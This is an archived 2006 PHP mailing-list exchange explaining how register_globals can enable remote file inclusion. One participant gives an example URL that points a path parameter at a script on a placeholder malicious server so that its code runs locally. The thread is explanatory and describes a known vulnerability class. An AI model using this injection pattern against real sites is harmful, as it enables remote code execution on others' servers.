RE: Fwd: Highjack?

[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

 



At 11:57 AM -0800 11/14/06, bruce wrote:
hi tedd...

for the following url, http://www.example.com/test.php?path=abc?dummy=123

if the register_globals is on, a malicious user could potentially invoke,
http://www.example.com/badscript.php?path=http://www.badserver.com/badscript
.txt?dummy=123, which would cause the 'badscript.txt' to be used in the
original script. now, this in and of itself wouldn't cause a file on the
http server to be changed. however, if the webapp somehow caused the $path
var to be invoked or to be used in an exec() function, then whatever is in
the 'badscript.txt' file will be run as if the file is on the local system.

at this point, you're pretty much at whim of the malicious user. now, the
chance of this happening is pretty slim, unless you're using some open
source app that's unsecure, and that a user can reasonably easy find. which
is what has happened to some apps in the past.

a more potential reason for the index.php files to be changed, is that there
was some security hole, either via apache, and/or the OS for the server.

hope this helps a little bit more...

Ohhh, so "badscript.php doesn't have to exist and the badscript.txt is imported via the url, the script is built using only the badscript.txt, and then executed "as-is" -- clever.

Off to try that... :-)

Thanks.

tedd

--
-------
http://sperling.com  http://ancientstones.com  http://earthstones.com

--
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php


[Index of Archives]     [PHP Home]     [Apache Users]     [PHP on Windows]     [Kernel Newbies]     [PHP Install]     [PHP Classes]     [Pear]     [Postgresql]     [Postgresql PHP]     [PHP on Windows]     [PHP Database Programming]     [PHP SOAP]

  Powered by Linux